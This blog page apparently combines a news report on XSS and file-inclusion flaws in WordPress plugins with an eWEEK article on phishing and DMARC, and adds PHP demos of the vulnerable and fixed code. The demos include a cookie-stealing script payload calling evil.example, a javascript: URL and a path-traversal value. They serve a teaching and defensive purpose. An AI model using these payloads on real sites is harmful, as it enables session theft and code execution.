Friday, November 24, 2017

Tag: Email Marketing

Most companies start their data journey the same way: with Excel. People who are deeply familiar with the business start collecting some basic data, slicing and dicing it, and trying to get a handle on what's happening. The next place they go, espe...

Earlier this week, WordPress administrators were urged to update the popular All-in-One SEO plugin to address a persistent cross-site scripting vulnerability.

But other widely used plugins also need updating. The plugin model for WordPress is simultaneously the platform’s greatest asset and biggest vulnerability.

Administrators can happily search the rich ecosystem of plugins and find all manner of advanced features and functionality to enhance their WordPress sites. Once downloaded, these plugins are easy to install. However, the plugins are frequently poorly coded or not regularly updated, exposing WordPress sites to potential Web attacks. WordPress itself is a pretty stable platform, but WordPress sites are frequently compromised because the attackers uncover a vulnerability in one of the plugins. It turns out All-in-One wasn’t the only vulnerable plugin found by Summer of Pwnage, a Dutch community project working on uncovering vulnerabilities in popular applications.

The project posted advisories this week on a dozen or so other vulnerabilities, most of them XSS, in widely used WordPress plugins.

The WP Fastest Cache WordPress plugin creates static HTML files from dynamic WordPress pages.

A local file inclusion vulnerability in this plugin can be exploited to run arbitrary PHP code. Attackers must first place a PHP file of their own on the target system in order to exploit it; the inclusion then executes that file with the privileges of the web server.
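The following is an added example, not WP Fastest Cache's own code, reconstructing the general pattern behind "local file inclusion caused by an unvalidated id POST parameter" and the usual fix. The directory layout, file names and the planted avatar.php are constructed for the demo under the system temp directory, so it runs offline with a plain PHP CLI:

```php
<?php
declare(strict_types=1);

// Added example, not the plugin's code. Constructed layout:
//   <tmp>/partials/general.php   legitimate options partial
//   <tmp>/uploads/avatar.php     a file the attacker managed to place on disk
$root = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
mkdir("$root/partials", 0700, true);
mkdir("$root/uploads", 0700, true);
file_put_contents("$root/partials/general.php", '<?php echo "general options form";');
file_put_contents("$root/uploads/avatar.php", '<?php echo "ATTACKER CODE RAN";');

// Vulnerable pattern: the request decides which file the interpreter parses.
// Appending ".php" does not help when the attacker's file already ends in .php,
// and "../" walks out of the intended directory.
function render_options_vulnerable(string $partialsDir, array $post): string
{
    $id = $post['id'] ?? 'general';
    ob_start();
    include $partialsDir . '/' . $id . '.php';
    return (string) ob_get_clean();
}

// Hardened pattern: the request supplies only a key; code maps the key to a
// fixed file name, so no request value ever reaches the include path.
const OPTION_PARTIALS = ['general' => 'general.php', 'advanced' => 'advanced.php'];

function render_options_hardened(string $partialsDir, array $post): string
{
    $id = $post['id'] ?? 'general';
    if (!is_string($id) || !array_key_exists($id, OPTION_PARTIALS)) {
        return 'Unknown options page.';
    }
    $path = $partialsDir . '/' . OPTION_PARTIALS[$id];
    if (!is_file($path)) {
        return 'Options page not installed.';
    }
    ob_start();
    include $path;
    return (string) ob_get_clean();
}

// Constructed attacker request: traversal to the planted file.
$attack = ['id' => '../uploads/avatar'];
echo 'vulnerable: ', render_options_vulnerable("$root/partials", $attack), PHP_EOL;
echo 'hardened:   ', render_options_hardened("$root/partials", $attack), PHP_EOL;
echo 'hardened:   ', render_options_hardened("$root/partials", ['id' => 'general']), PHP_EOL;

// Remove the constructed files.
array_map('unlink', ["$root/partials/general.php", "$root/uploads/avatar.php"]);
array_map('rmdir', ["$root/partials", "$root/uploads", $root]);
```

The vulnerable renderer executes the planted file; the hardened one refuses the key before any path is built. The allow-list is the important part: a blacklist of "../" sequences is bypassable, whereas a key-to-filename map leaves nothing for the attacker to influence.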

The issue is in /admin/partials/menu/options.php and is caused by the lack of input validation on the id POST parameter.

WP Live Chat Support adds a live chat function to a WordPress site.

The persistent XSS flaw in WP Live Chat Support is similar to the one found in All-in-One SEO: attackers can inject malicious JavaScript code into the application, which then executes in the victim’s browser with the privileges of the logged-in WordPress user.

Attackers can exploit the flaw to steal a victim’s session tokens and login credentials, execute code in the victim's browser, and log keystrokes.

The plugin uses the Referer header to show backend users the page on which a chat was initiated, but the URL taken from that header is not output encoded for the context in which it is displayed. Because the Referer header is entirely under the sender's control, the stored value can carry script.

Stored XSS flaws are typically more serious than reflected ones because the payload sits in the application and runs whenever a user views the affected page; the attacker does not have to deliver a crafted link to each victim.

The victim, potentially the logged-in Administrator, only has to view the wplivechat-menu page for the malicious code to execute.

Administrators should update to Version 6.2.02.

Another stored XSS vulnerability was found in the WordPress Activity Log plugin, which allows administrators to monitor and track site activity.

An unauthenticated attacker would be able to inject malicious JavaScript code into the application, which will then execute within the browser of any logged-in user who views the Activity Log.

The Activity Log plugin fails to sufficiently validate the X-Forwarded-For HTTP header, and fails to output encode it, when logging a failed login attempt (an incorrect password). Anyone can send that header, so the "client IP" recorded for the failed login is attacker-supplied text.

The injected value is stored in the Activity Log and executes every time someone views the log in wp-admin. Attackers would be able to steal victims’ session tokens and login credentials, log keystrokes, perform arbitrary actions in the context of the user, and deliver malware.
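The pattern shared by the WP Live Chat Support (Referer) and Activity Log (X-Forwarded-For) flaws, as an added example that is not either plugin's code: a request header is stored and later rendered in wp-admin. The in-memory log, the two constructed requests and the payloads are all invented for the demo. The escaping helpers stand in for WordPress's own esc_html(), esc_attr() and esc_url(), which a real plugin should call instead; the same context-aware encoding is the fix for the unencoded page request parameter described later for the remaining plugins.

```php
<?php
declare(strict_types=1);

// Added example, not the code of WP Live Chat Support or the Activity Log
// plugin. The log is an in-memory array standing in for the plugins' storage.

function record_failed_login(array &$log, array $headers, string $user): void
{
    // Both the username typed and the X-Forwarded-For header are attacker-controlled.
    $log[] = [
        'event' => 'failed_login',
        'user'  => $user,
        'ip'    => $headers['X-Forwarded-For'] ?? $headers['REMOTE_ADDR'] ?? '-',
    ];
}

function record_chat_start(array &$log, array $headers): void
{
    // The Referer header is whatever the client chooses to send.
    $log[] = ['event' => 'chat_start', 'page' => $headers['Referer'] ?? ''];
}

// Stand-in for esc_html()/esc_attr(): encode for HTML text and quoted attributes.
function esc_text(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Stand-in for esc_url(): only http(s) belongs in an href. A javascript: or
// data: URL is replaced, not encoded, because encoding does not neutralise it.
function esc_href(string $url): string
{
    $parts = parse_url($url);
    $scheme = strtolower($parts['scheme'] ?? '');
    if ($parts === false || !in_array($scheme, ['http', 'https'], true)) {
        return '#';
    }
    return esc_text($url);
}

// Vulnerable rendering: stored values dropped straight into HTML.
function render_log_vulnerable(array $log): string
{
    $rows = '';
    foreach ($log as $e) {
        $rows .= $e['event'] === 'failed_login'
            ? "<tr><td>failed login</td><td>{$e['user']}</td><td>{$e['ip']}</td></tr>\n"
            : "<tr><td>chat</td><td colspan=\"2\"><a href=\"{$e['page']}\">{$e['page']}</a></td></tr>\n";
    }
    return "<table>\n$rows</table>";
}

// Hardened rendering: encode each value for the context it lands in.
function render_log_hardened(array $log): string
{
    $rows = '';
    foreach ($log as $e) {
        if ($e['event'] === 'failed_login') {
            $rows .= '<tr><td>failed login</td><td>' . esc_text($e['user'])
                   . '</td><td>' . esc_text($e['ip']) . "</td></tr>\n";
        } else {
            $rows .= '<tr><td>chat</td><td colspan="2"><a href="' . esc_href($e['page']) . '">'
                   . esc_text($e['page']) . "</a></td></tr>\n";
        }
    }
    return "<table>\n$rows</table>";
}

// Constructed requests: a wrong-password attempt carrying script in the IP
// header, and a chat start whose Referer is a javascript: URL.
$log = [];
record_failed_login($log, [
    'REMOTE_ADDR'     => '203.0.113.7',
    'X-Forwarded-For' => '<script>fetch("https://evil.example/?c="+document.cookie)</script>',
], 'admin');
record_chat_start($log, ['Referer' => 'javascript:alert(document.domain)']);

echo "--- vulnerable ---\n", render_log_vulnerable($log), "\n";
echo "--- hardened ---\n", render_log_hardened($log), "\n";
```

Two things to take from the hardened version: the encoding happens at output time, per context, rather than by "cleaning" the header on the way in (the log should keep the raw evidence of what was sent), and a URL placed in an href needs a scheme check on top of entity encoding, since `javascript:` survives htmlspecialchars unchanged.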

Administrators should update to Version 2.3.2.

The remaining plugins on this list had a cross-site scripting vulnerability that would allow an attacker to perform a variety of actions, such as stealing Administrator session tokens and performing arbitrary actions on the website with Administrator privileges. The flaws could be exploited by tricking logged-in WordPress administrators into opening a malicious site. All-in-One was vulnerable because the plugin failed to properly sanitize requests, which let attackers inject malicious JavaScript code via the request headers.

The vulnerability in all the other plugins was the result of a lack of output encoding on the page request parameter. Failing to validate input and to encode output is a common coding mistake. WordPress normally sanitizes this parameter, which would shut down the cross-site scripting, but did not in these instances because of the way the parameter value was set.

The Top 10-Popular Posts plugin tracks daily and total visits for blog posts and displays the number of visits for popular and trending posts.

The issue exists in the file class-stats.php.

Anyone using the Top 10 plugin should update to Version 2.3.1.

The WP No External Links plugin masks all external links across all pages by making them internal or hiding them altogether.

The issue is in the wp-noexternallinks-options.php file.

Anyone using the WP No External Links plugin should update to Version 3.5.16.

The Google Forms plugin embeds a published, public Google Form into a WordPress page or widget.

The issue is in file wpgform-logging.php.

Anyone using the Google Forms plugin should update to Version 0.85.

The Simple Membership WordPress plugin lets administrators set up the ability to have users sign in and out of the website and restrict access to certain pieces of content.

The flaw existed in multiple files, including class.swpm-members.php, class.swpm-membership-levels.php, admin_members_list.php, and admin_all_payment_transactions.php.

WordPress administrators using Simple Membership should update to Version 3.2.9.

The Profile Builder WordPress plugin provides WordPress administrators with a front-end login, a user registration page, and a way to edit user profiles.

The issue is in the file class-email-confirmation.php, which outputs the page parameter without encoding it.

Administrators should update to Version 2.4.2.

MailChimp is a widely popular email marketing platform.

The Easy Forms for MailChimp WordPress plugin lets users add unlimited MailChimp signup forms to different parts of a WordPress site, including posts, pages, sidebars, and other widgetized areas.

Administrators should update to Version 6.1.

Master Slider is a responsive image and content slider that gives users smooth, hardware-accelerated transitions.

The plugin supports touch navigation with a pure swipe gesture.

Administrators should update Master Slider to Version 2.8.0.

Email Users lets WordPress administrators send email to all registered users.

The issue exists in the file email_users_user_settings.php.

Administrators using the plugin should update to Version 4.8.3.

Attackers like to target WordPress sites through vulnerabilities in third-party plugins, and plenty of administrators neglect to patch the CMS at all.

Even those diligent about staying on top of the core updates may forget to update the plugins, or opt not to because they don't want the updated plugins to break existing functionality. When plugins are no longer being actively maintained, the administrator may decide to keep using the plugin instead of looking for an alternative.

There are many reasons for still using outdated plugins, but the bottom line is that they provide attackers with a simple way to compromise and seize control of the WordPress site.
A Return Path study warns marketers of the dire consequences of fraudulent email, as consumers lose trust in a brand impacted by a phishing attack.

Phishing and fraudulent email affect organizations of all sizes, and the impact is not limited to security risk; it reaches marketers too.

Email delivery vendor Return Path has examined the cost of phishing on marketers in a report that reveals the wider impact of phishing campaigns.

According to Return Path's analysis, consumers are less likely to trust a brand after it has been impacted by a phishing attack.

As such, consumers who have been tricked by a phishing email purporting to come from a brand are less likely to open a subsequent real email from that same brand.

Average read rates for messages from brands where a phishing attack occurred were 18 percent lower on Gmail and 11 percent lower on Yahoo than for brands that were not phished. While it is not all that shocking that there is a connection between phishing and consumer behavior, the study also found a few surprises.

"We were most surprised by the disconnect between the perception and the reality of the phishing problem among marketers," Estelle Derouet, vice president of marketing and email fraud protection at Return Path, told eWEEK. The study found that 81 percent of marketers would be concerned or very concerned if customers received a malicious email that appeared to come from their brand, and yet only 32 percent of marketers say that securing the email channel is a top priority in 2016.

"To us, this suggests that most marketers just don't think email fraud is happening to them," Derouet said. She added that Return Path analyzed Gmail and Yahoo inbox placement rates across 71 brands within 10 days of a phishing attack and found that one in five phishing attacks results in reduced deliverability and one in three results in reduced engagement.

"For anyone relying on email marketing to generate revenue, this can have catastrophic consequences," Derouet said.

According to Derouet, the Return Path study discovered that 76 percent of marketers surveyed say they have little to no visibility into phishing attacks leveraging their brand. Among the challenges facing brand owners is the fact that phishing attacks are not always the fault of the legitimate brand owner.

"Even if the brand has the most secure email program in place, there's a chance they'll get phished," she said.
"It is the brands who are not implementing the latest and greatest email authentication measures that put their legitimate email at risk."

Derouet noted that, in contrast, email providers such as Google and Yahoo are primarily concerned with providing a great experience for their users by keeping malicious email out and legitimate email in user inboxes.

"These companies watch user behavior carefully to inform their delivery decisions," she said. "If a lot of users start flagging a brand's email as malicious or as spam and that brand doesn't have adequate authentication measures in place, the sender reputation will suffer and, as a result, legitimate mail is more likely to get blocked."

There are a number of standards-based approaches that help organizations deliver authenticated email; among them is DMARC (Domain-based Message Authentication, Reporting and Conformance), which builds on SPF and DKIM and lets a domain owner publish, in DNS, what receivers should do with mail that fails aligned authentication.
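As an added illustration, not Return Path's code nor any mail provider's, here is the decision a receiver makes under DMARC for a message whose visible From: domain is spoofed: parse the domain's published record, check whether SPF or DKIM passed and aligns with the From: domain, and otherwise apply the published policy. The record, the domains (yourcompany.example and the rest) and the authentication results are constructed; no DNS is queried, the record for a subdomain is taken to be the organisational domain's record, and the organisational domain is approximated as the last two labels, a simplification of the Public Suffix List lookup real validators perform.

```php
<?php
declare(strict_types=1);

// Added example, not any MTA's or Return Path's code. Constructed record and
// authentication results; no DNS lookups.

function parse_dmarc(string $txt): array
{
    // Defaults per the DMARC spec: relaxed alignment, no separate subdomain policy.
    $tags = ['p' => 'none', 'sp' => null, 'adkim' => 'r', 'aspf' => 'r'];
    foreach (explode(';', $txt) as $kv) {
        if (strpos($kv, '=') === false) {
            continue;
        }
        [$k, $v] = array_map('trim', explode('=', $kv, 2));
        $tags[strtolower($k)] = strtolower($v);
    }
    if (($tags['v'] ?? '') !== 'dmarc1') {
        throw new InvalidArgumentException('not a DMARC record');
    }
    return $tags;
}

// Simplification: last two labels. Real validators use the Public Suffix List.
function org_domain(string $d): string
{
    return implode('.', array_slice(explode('.', strtolower($d)), -2));
}

// Relaxed alignment ('r'): same organisational domain. Strict ('s'): exact match.
function aligned(string $fromDomain, ?string $authDomain, string $mode): bool
{
    if ($authDomain === null) {
        return false;
    }
    return $mode === 's'
        ? strtolower($fromDomain) === strtolower($authDomain)
        : org_domain($fromDomain) === org_domain($authDomain);
}

// $auth['spf']:  domain for which SPF passed (the envelope sender), or null.
// $auth['dkim']: d= of a DKIM signature that verified, or null.
// Returns 'pass', or the policy to apply: 'none', 'quarantine' or 'reject'.
function dmarc_disposition(string $fromDomain, string $record, array $auth): string
{
    $t = parse_dmarc($record);
    if (aligned($fromDomain, $auth['spf'] ?? null, $t['aspf'])
        || aligned($fromDomain, $auth['dkim'] ?? null, $t['adkim'])) {
        return 'pass';
    }
    $isSubdomain = org_domain($fromDomain) !== strtolower($fromDomain);
    return ($isSubdomain && $t['sp'] !== null) ? $t['sp'] : $t['p'];
}

// Constructed record for the brand's organisational domain.
$record = 'v=DMARC1; p=reject; sp=quarantine; rua=mailto:dmarc-rua@yourcompany.example';

// 1. Spoofed From: sent from attacker infrastructure. SPF passes only for the
//    attacker's own envelope domain and there is no DKIM signature: nothing aligns.
echo dmarc_disposition('yourcompany.example', $record,
    ['spf' => 'bulk-sender.evil', 'dkim' => null]), PHP_EOL;

// 2. Legitimate marketing mail relayed by a third-party sender that signs with
//    the brand's DKIM key: DKIM aligns even though SPF does not.
echo dmarc_disposition('yourcompany.example', $record,
    ['spf' => 'esp.example', 'dkim' => 'yourcompany.example']), PHP_EOL;

// 3. Spoofed subdomain with no authentication at all: the sp= policy applies.
echo dmarc_disposition('news.yourcompany.example', $record,
    ['spf' => null, 'dkim' => null]), PHP_EOL;
```

Case 2 is why marketers have to be involved: a brand that moves to p=reject without first making its email service provider sign with an aligned DKIM key (or use an aligned envelope domain) will have its own campaigns rejected. The record's rua= address is where receivers send aggregate reports, which is how a brand gets the visibility into spoofing that the survey found most marketers lack.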

That said, Derouet commented that DMARC scares a lot of people, especially the nontechnical among us.

"But it is, without a doubt, the best technology out there to fight domain spoofing," she said. According to Derouet, any email, no matter how sophisticated, that spoofs a company's domain in the visible From address (e.g., From: Sender <sender@YourCompany.com>) will be blocked before it reaches users with DMARC.

The ability to block phishing emails before they reach consumer inboxes is a big deal.

"As our report revealed, users are pretty terrible at identifying today's class of phishing messages," Derouet said. "Ninety-seven percent of recipients will open a malicious message, and 45 percent of users will offer up personal information during a phishing scam."

Derouet's hope is that marketers will come to understand not only that their customers are being impacted by phishing, but that it is also up to the marketers to help fix the problem.

"Email fraud is a business problem, not just an IT or security problem," Derouet said. "The cost of doing nothing about phishing is not sustainable for businesses."

Sean Michael Kerner is a senior editor at eWEEK and InternetNews.com.

Follow him on Twitter @TechJournalist.